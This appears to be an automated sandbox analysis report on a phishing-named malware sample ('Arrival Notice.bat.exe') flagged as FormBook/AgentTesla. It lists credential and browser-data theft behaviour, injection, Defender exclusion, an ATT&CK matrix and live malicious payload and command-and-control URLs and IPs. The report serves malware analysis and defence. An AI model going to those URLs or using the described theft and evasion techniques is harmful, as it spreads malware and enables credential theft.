              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeQueries volume information: C:\Users\user\AppData\Roaming\dLrZsz.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeQueries volume information: C:\Users\user\AppData\Local\Temp\-6qxw.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 8.2.Arrival Notice.bat.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.Arrival Notice.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.-6qxw.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.-6qxw.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4145710569.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.4147800420.0000000005740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4145840212.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.4147461137.0000000004FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.3464254438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4145942819.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.3470248065.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4143217663.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143205366.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2005850600.0000000002410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.4145476325.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.4145544196.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\compact.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
              Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 8.2.Arrival Notice.bat.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.Arrival Notice.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.-6qxw.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.-6qxw.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4145710569.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.4147800420.0000000005740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4145840212.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.4147461137.0000000004FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.3464254438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4145942819.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.3470248065.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4143217663.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143205366.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2005850600.0000000002410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.4145476325.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.4145544196.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		412
              Process Injection              		1
              Masquerading              		1
              OS Credential Dumping              		221
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading              		1
              Scheduled Task/Job              		11
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		13
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Abuse Elevation Control Mechanism              		41
              Virtualization/Sandbox Evasion              		Security Account Manager41
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading              		412
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture14
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Abuse Elevation Control Mechanism              		Cached Domain Credentials113
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
              Obfuscated Files or Information              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
              Software Packing              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Timestomp              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              DLL Side-Loading              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1459718 Sample: Arrival Notice.bat.exe Startdate: 19/06/2024 Architecture: WINDOWS Score: 100 87 www.lenovest.xyz 2->87 89 www.zonenail.info 2->89 91 25 other IPs or domains 2->91 121 Snort IDS alert for network traffic 2->121 123 Malicious sample detected (through community Yara rule) 2->123 125 Antivirus detection for URL or domain 2->125 129 15 other signatures 2->129 14 Arrival Notice.bat.exe 7 2->14         started        18 dLrZsz.exe 5 2->18         started        signatures3 127 Performs DNS queries to domains with low reputation 87->127 process4 file5 75 C:\Users\user\AppData\Roaming\dLrZsz.exe, PE32 14->75 dropped 77 C:\Users\user\...\dLrZsz.exe:Zone.Identifier, ASCII 14->77 dropped 79 C:\Users\user\AppData\Local\...\tmp4908.tmp, XML 14->79 dropped 81 C:\Users\user\...\Arrival Notice.bat.exe.log, ASCII 14->81 dropped 139 Adds a directory exclusion to Windows Defender 14->139 141 Injects a PE file into a foreign processes 14->141 20 Arrival Notice.bat.exe 14->20         started        23 powershell.exe 23 14->23         started        25 powershell.exe 23 14->25         started        27 schtasks.exe 1 14->27         started        143 Multi AV Scanner detection for dropped file 18->143 145 Machine Learning detection for dropped file 18->145 29 schtasks.exe 1 18->29         started        31 dLrZsz.exe 18->31         started        signatures6 process7 signatures8 131 Maps a DLL or memory area into another process 20->131 33 WRrRgOfpwFEFXfaWUCsdTxK.exe 20->33 injected 133 Loading BitLocker PowerShell Module 23->133 35 WmiPrvSE.exe 23->35         started        37 conhost.exe 23->37         started        39 conhost.exe 25->39         started        41 conhost.exe 27->41         started        43 conhost.exe 29->43         started        process9 process10 45 compact.exe 33->45         started        dnsIp11 105 185.234.72.101, 49765, 80 COMBAHTONcombahtonGmbHDE United Kingdom 45->105 83 C:\Users\user\AppData\Local\Temp\-6qxw.exe, PE32 45->83 dropped 85 C:\Users\user\...\OdR8akYyHwr3ISR[1].exe, PE32 45->85 dropped 147 Tries to steal Mail credentials (via file / registry access) 45->147 149 Modifies the context of a thread in another process (thread injection) 45->149 151 Maps a DLL or memory area into another process 45->151 153 2 other signatures 45->153 50 -6qxw.exe 45->50         started        53 WRrRgOfpwFEFXfaWUCsdTxK.exe 45->53 injected 56 firefox.exe 45->56         started        file12 signatures13 process14 dnsIp15 107 Multi AV Scanner detection for dropped file 50->107 109 Machine Learning detection for dropped file 50->109 111 Injects a PE file into a foreign processes 50->111 58 -6qxw.exe 50->58         started        61 -6qxw.exe 50->61         started        93 shahaf3d.com 64.46.118.35, 49753, 49754, 49755 SINGLEHOP-LLCUS United States 53->93 95 www.klimkina.pro 185.137.235.193, 49749, 49750, 49751 SELECTELRU Russian Federation 53->95 97 10 other IPs or domains 53->97 signatures16 process17 signatures18 137 Maps a DLL or memory area into another process 58->137 63 WRrRgOfpwFEFXfaWUCsdTxK.exe 58->63 injected process19 signatures20 155 Maps a DLL or memory area into another process 63->155 157 Found direct / indirect Syscall (likely to bypass EDR) 63->157 66 runonce.exe 63->66         started        process21 signatures22 113 Tries to steal Mail credentials (via file / registry access) 66->113 115 Tries to harvest and steal browser information (history, passwords, etc) 66->115 117 Modifies the context of a thread in another process (thread injection) 66->117 119 2 other signatures 66->119 69 WRrRgOfpwFEFXfaWUCsdTxK.exe 66->69 injected 73 firefox.exe 66->73         started        process23 dnsIp24 99 ndhockeyprospects.com 162.241.253.174, 49780, 80 UNIFIEDLAYER-AS-1US United States 69->99 101 www.qmancha.com 202.95.21.152, 49783, 49785, 49787 BCPL-SGBGPNETGlobalASNSG Singapore 69->101 103 www.zonenail.info 66.29.145.248, 49794, 49796, 49797 ADVANTAGECOMUS United States 69->103 135 Found direct / indirect Syscall (likely to bypass EDR) 69->135 signatures25

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Arrival Notice.bat.exe26%ReversingLabs
              Arrival Notice.bat.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\dLrZsz.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\-6qxw.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exe62%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              C:\Users\user\AppData\Local\Temp\-6qxw.exe62%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              C:\Users\user\AppData\Roaming\dLrZsz.exe26%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.fontbureau.com/designers0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
              http://www.fontbureau.com/designersG0%URL Reputationsafe
              http://www.fontbureau.com/designers/?0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.fontbureau.com/designers?0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://www.fonts.com0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
              http://www.fontbureau.com0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              https://td.doubleclick.net0%URL Reputationsafe
              https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css0%Avira URL Cloudsafe
              http://185.234.72.101/OdR8akYyHwr3ISR.exej0%Avira URL Cloudsafe
              https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
              http://185.234.72.101/OdR8akYyHwr3ISR.exe0%Avira URL Cloudsafe
              https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
              http://www.lenovest.xyz/e20q/?tF1tk6=WPritX3A9R+ySLDGPku/GD0rpC4O61Hw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRL6LWdHBkCM2rbaWuRFm/Az6wkZG2Vj0/zBQ=&8FiTp=kJrtnVsPEnF0JV0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              https://shahaf3d.com/wp-admin/admin-ajax.php100%Avira URL Cloudmalware
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              http://www.931951.com/2ha1/100%Avira URL Cloudmalware
              http://www.srripaspocon.org/egr4/?tF1tk6=OombhWzhkCuNqFAREgI5QSI/n6iJ7yj7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qC0S7x9ud02r6ucB+LtM+AWVrEw63feFc+fJU=&8FiTp=kJrtnVsPEnF0JV0%Avira URL Cloudsafe
              https://fburl.com0%Avira URL Cloudsafe
              http://www.lenovest.xyz/e20q/0%Avira URL Cloudsafe
              http://www.searchvity.com/?dn=0%Avira URL Cloudsafe
              https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
              http://www.leadchanges.info/mjuo/0%Avira URL Cloudsafe
              https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
              https://www.futuregainers.net/l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywY0%Avira URL Cloudsafe
              http://www.ndhockeyprospects.com/nce6/?QTth=cdSXMBmhjDz&gheP1DX=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY=0%Avira URL Cloudsafe
              http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css100%Avira URL Cloudmalware
              https://www.googleanalytics.com0%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              http://www.shahaf3d.com/0a9p/100%Avira URL Cloudmalware
              http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
              http://www.zonenail.info/kscn/0%Avira URL Cloudsafe
              http://tempuri.org/DataSet1.xsdSInventory_Management.Properties.Resources0%Avira URL Cloudsafe
              http://www.shopnow321.online/41br/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=65BU6tOk0p5LPOIJv5eZvte3ybUvohRc7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rehilNLqQM6pEfZVUJ4F0gMms0MV4xVJNebQ=0%Avira URL Cloudsafe
              https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
              http://www.searchvity.com/0%Avira URL Cloudsafe
              http://www.srripaspocon.org/egr4/0%Avira URL Cloudsafe
              http://www.931951.com/2ha1/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=r6q+x3A/FEQLw6gnIIDKqn7cXK90QEz4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2KETivrZrq09Pe+ZYF4dhJGLDVCdvvTj0Vf0=100%Avira URL Cloudmalware
              http://www.againbeautywhiteskin.asia/3h10/?tF1tk6=9mZLXJL8GvO5ODxaoOomsqt4kv5XiFfxC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtHTdpL9gTGqilltwgGUv9YmP3AeMh48KIxzc=&8FiTp=kJrtnVsPEnF0JV0%Avira URL Cloudsafe
              https://w.ladicdn.com/v2/source/respond.min.js?v=15693102226930%Avira URL Cloudsafe
              http://www.againbeautywhiteskin.asia/3h10/0%Avira URL Cloudsafe
              http://www.torentreprenad.com/r45o/0%Avira URL Cloudsafe
              https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
              https://optimize.google.com0%Avira URL Cloudsafe
              http://www.grecanici.com/4iea/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=LPPTutp79E4NI/FSO4tKhhCSj88LXvNdsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp+x+MZNm8bqFqjUBXzLeJ0h1+xCuEpOdbPDQ=0%Avira URL Cloudsafe
              https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
              http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.100%Avira URL Cloudmalware
              http://www.sakkal.comx60%Avira URL Cloudsafe
              https://niteothemes.com0%Avira URL Cloudsafe
              http://www.futuregainers.net/l4k7/0%Avira URL Cloudsafe
              http://push.zhanzhang.baidu.com/push.js0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
              http://www.shopnow321.online/41br/0%Avira URL Cloudsafe
              http://www.qmancha.com/3in6/?gheP1DX=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&QTth=cdSXMBmhjDz0%Avira URL Cloudsafe
              http://www.93v0.com/hcaw/0%Avira URL Cloudsafe
              https://www.googleoptimize.com0%Avira URL Cloudsafe
              http://www.zonenail.info/kscn/?gheP1DX=CaZls2vsCC5SEDZO9v0TsRD/xR3TWESK018fdyQAavLwN8o4xbvFproXKVSs0R5JJuiJmc+bWHrVqZCkdQKET8aXg+bTbKyQsViJTM4/a4CXWVNH2Hn1tMo=&QTth=cdSXMBmhjDz0%Avira URL Cloudsafe
              https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
              https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
              https://youtu.be/uO1hXLmT2j40%Avira URL Cloudsafe
              http://klimkina.pro/4mpz/?tF1tk6=Y0%Avira URL Cloudsafe
              https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
              http://www.klimkina.pro/4mpz/?tF1tk6=Y+s3rA3a2LtNoPwXEph1agZvu5GuOlYPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4Voi3TiJN+9DCYn4mYX0I3YWd5veeVZiJYYCE=&8FiTp=kJrtnVsPEnF0JV0%Avira URL Cloudsafe
              http://www.zonenail.info0%Avira URL Cloudsafe
              http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2100%Avira URL Cloudmalware
              http://www.futuregainers.net/l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+QktvoJK9v8ttAQP4wg2bLqAZCOth8+1YyfQ=&8FiTp=kJrtnVsPEnF0JV0%Avira URL Cloudsafe
